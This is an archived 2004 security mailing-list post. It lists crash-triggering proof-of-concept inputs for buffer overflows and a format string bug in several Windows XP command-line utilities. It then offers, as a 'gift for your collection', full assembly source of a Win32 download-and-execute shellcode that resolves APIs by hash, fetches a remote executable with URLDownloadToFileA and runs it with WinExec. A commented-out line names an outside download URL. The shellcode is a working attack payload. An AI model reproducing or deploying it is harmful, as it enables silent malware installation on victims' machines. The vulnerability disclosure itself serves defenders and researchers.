
Windows XP multiple local buffer overflows and format string bugs


From: jerome.athias at caramail.com (Jérôme ATHIAS)
Date: Fri, 22 Oct 2004 18:23:41 GMT

Hi guys,

I've just come back after moving, so sorry if I'm wrong, but I don't remember having seen this on Bugtraq, so if someone is 
interested...

AUTHOR
Komrade

DATE
08/10/2004

PRODUCT
Windows XP
Tested on Windows XP Service Pack 2, prior versions should have the same bugs.

DETAILS
Here is a list of some Windows XP utilities that are vulnerable to local buffer overflows and format string bugs.
These programming errors, alone, are not security vulnerabilities (you need local access and you don't gain more 
privilege), but they could become serious security issues if someone has the possibility to remotely start a program 
with at least one parameter (as happens with the "shell:" protocol security issue in the Mozilla browser prior to 
version 1.7.3, which permits remotely executing a program and passing parameters to it).

This information has been disclosed to make it clear that if a new vulnerability is discovered which allows remote 
execution of programs (passing parameters), all Windows XP operating systems will be affected by several remote buffer 
overflows and format string vulnerabilities allowing remote code execution.

Buffer Overflow in immc.exe
POC
c:\> immc.exe aaaaaaaaaa(285 'a' characters)

Buffer Overflow in eventvwr.exe (UNICODE)
POC
c:\> eventvwr.exe aaaaaaaaaa(848 'a' characters)

Buffer Overflow in netsetup.exe
POC
c:\> netsetup.exe aaaaaaaaaa(285 'a' characters)

Buffer Overflow in mrinfo.exe
POC
c:\> mrinfo.exe aaaaaaaaaa(71 'a' characters)

Format String in sort.exe
POC
c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n


GIFT:
This is a generic Win32 download-and-execute shellcode for your collection

[BITS 32]
; Win32 download-and-execute shellcode, NASM (Intel) syntax, 32-bit.
; Layout: `jmp data` / `call start` / `pop edi` is the call-pop trick that
; leaves edi = address of the string table at `data`, so the code needs no
; fixed load address.
; Register roles: edi = data pointer, ebx = kernel32 base, eax = scratch /
; resolved API address, ecx = zero / argument scratch.
; APIs are resolved by hash (LGetProcAddress) rather than by name, so the
; hash constants pushed below are the only "import" visible in the bytes;
; they, and the PEB walk in LK32Base, are what a detection rule keys on.

jmp     data
                
start:

        pop edi                 ; edi = address of `data` (pushed by `call start`)

        call LK32Base           ; eax = kernel32.dll base (PEB walk, no imports)

        mov ebx,eax             ; keep kernel32 base in ebx for later lookups

        push eax                ; kernel32 base address
        push  0xec0e4e8e        ; LoadLibraryA hash
        call    LGetProcAddress ; find address (leaves both args on the stack)


        xor ecx, ecx            ; ecx = 0
        mov cx, 0x6e6f          ; Move "on" in cx
        push ecx                ; Push null-terminated "on"
        push 0x6d6c7275         ; Push "urlm", completing "urlmon\0" on the stack
        push esp                ; lpLibFileName -> that stack string
        call eax                ; eax holds our function address (LoadLibraryA)

download:

        push eax                ; urlmon.dll base address
        push  0x702f1a36        ; URLDownloadToFileA hash
        call LGetProcAddress    ; find address
        


        xor ecx, ecx            ; ecx = 0 for later use
        push ecx                ; lpfnCB
        push ecx                ; dwReserved
        lea esi, [edi ] ; szFileName = first string in `data`
        push esi                ; szFileName
        lea esi, [edi+8]        ; szURL = second string in `data` (8 bytes after the file name)
        push esi                ; szURL
        push ecx                ; pCaller
        call eax                ; eax holds our function address (URLDownloadToFileA)

exec:   
        push ebx                ; kernel32 base address
        push 0x0e8afe98         ; hash labelled WinExec by the author
        call LGetProcAddress  ;winexec


        push ecx                ; uCmdShow — reuses ecx, assumed still 0 (ecx is caller-saved, so this is not guaranteed after the call above)
        push edi                ; lpCmdLine = file name string at `data`
        call eax                ; eax holds our function address (WinExec)

        
        xor ecx,ecx
        dec ecx                 ; ecx = 0xffffffff
bla:
        
        
        loop bla                ; busy-wait: spins ecx times before exiting (author marked it optional)

        
        push ebx                ; kernel32 base address
        push 0x73e2d87e         ; hash of the exit routine (only labelled "exit" in this listing)
        call LGetProcAddress  
        call eax                ;exit

        ;---------------------------------------------------------------
        ; LK32Base — locate the kernel32.dll base without any import.
        ; In:    nothing
        ; Out:   eax = module base found via the PEB loader list
        ; Clobb: eax, flags (esi/ebp saved and restored)
        ; fs:[0x30] is the PEB on 32-bit Windows; +0x0c is PEB->Ldr and
        ; +0x1c is the InInitializationOrderModuleList head. The code
        ; takes the second entry of that list and returns its DllBase
        ; (+0x08 relative to the list link). That list-order assumption
        ; is what makes this OS-version dependent.
        ;---------------------------------------------------------------
        LK32Base:
                push ebp
                push esi

                mov eax, [fs:0x30]      ; eax = PEB
                

                mov eax, [eax + 0x0c]   ; eax = PEB->Ldr
                mov esi, [eax + 0x1c]   ; esi = first InInitializationOrder entry
                lodsd                   ; eax = Flink of that entry -> second entry
                mov ebp, [eax + 0x08]   ; ebp = DllBase of the second entry
        
                mov eax, ebp            ; return value
                pop esi
                pop ebp
                ret 



        ;---------------------------------------------------------------
        ; LGetProcAddress — resolve an export by name hash.
        ; Stack args (after the four pushes below):
        ;   [esp+20] = 32-bit hash of the export name
        ;   [esp+24] = DLL base address
        ; The args are NOT removed by `ret`; callers never pop them either.
        ; Out:   eax = export virtual address, or 0 if no name matches
        ;        edx = DLL base (side effect of LDone)
        ; Clobb: eax, edx, flags (ebx/ebp/esi/edi saved and restored)
        ; Hash: edi = ror(edi, 13) + byte over each byte of the export
        ; name; the same scheme used by many Metasploit-era payloads, so
        ; the hash constants are the detectable artefact.
        ;---------------------------------------------------------------
        LGetProcAddress:

                push ebx
                push ebp
                push esi
                push edi
                
                mov ebp, [esp + 24]; ebp = DLL base address
                mov eax, [ebp + 0x3c]; eax = PE header offset (e_lfanew)
                mov edx, [ebp + eax + 120]  ; export directory RVA (DataDirectory[0] of PE32 optional header)
                add edx, ebp; edx = export directory table
                mov ecx, [edx + 24]; ecx = NumberOfNames
                mov ebx, [edx + 32]; AddressOfNames RVA
                add ebx, ebp; ebx = name pointer table

        LFnlp:
                jecxz LNtfnd            ; no names left -> not found
                dec ecx                 ; walk names from last to first
                mov esi, [ebx + ecx * 4]
                add esi, ebp; esi = export name string
                xor edi, edi            ; edi = running hash
                cld                     ; lodsb must walk forward

        LHshlp:
                xor eax, eax            ; ah = 0 for the terminator test
                lodsb                   ; al = next name byte
                cmp al, ah              ; end of string?
                je LFnd
                ror edi, 13             ; hash = ror(hash, 13) + byte
                add edi, eax
                jmp LHshlp

        LFnd:
                ; compare computed hash to argument
                cmp edi, [esp + 20]
                jnz LFnlp               ; mismatch -> try the next name
                mov ebx, [edx + 36]; AddressOfNameOrdinals RVA
                add ebx, ebp
                mov cx, [ebx + 2 * ecx]; cx = ordinal of the matched name (16-bit; upper ecx bits keep the index's high bits)
                mov ebx, [edx + 28]; AddressOfFunctions RVA
                add ebx, ebp
                mov eax, [ebx + 4 * ecx]; eax = function RVA
                add eax, ebp            ; eax = function virtual address
                jmp LDone

        LNtfnd:
                xor eax, eax            ; not found -> return 0

        LDone:
                mov edx, ebp            ; edx = DLL base
                
                pop edi
                pop esi
                pop ebp
                pop ebx         
                ret                     ; args stay on the stack (no `ret 8`)


        ; String table. `call start` pushes its own return address — the
        ; address of the first db — which `pop edi` in start receives.
        data: 
        call start
        db "mhh.exe",0x00       ; file name / command line, 8 bytes incl. NUL
;       db "http://www.ilovedelikon.com/notbig.exe";, 0x00

Sorry if this information is out of date or shit...

Forfait AOL ADSL 5 Méga à 22.90EUR/mois


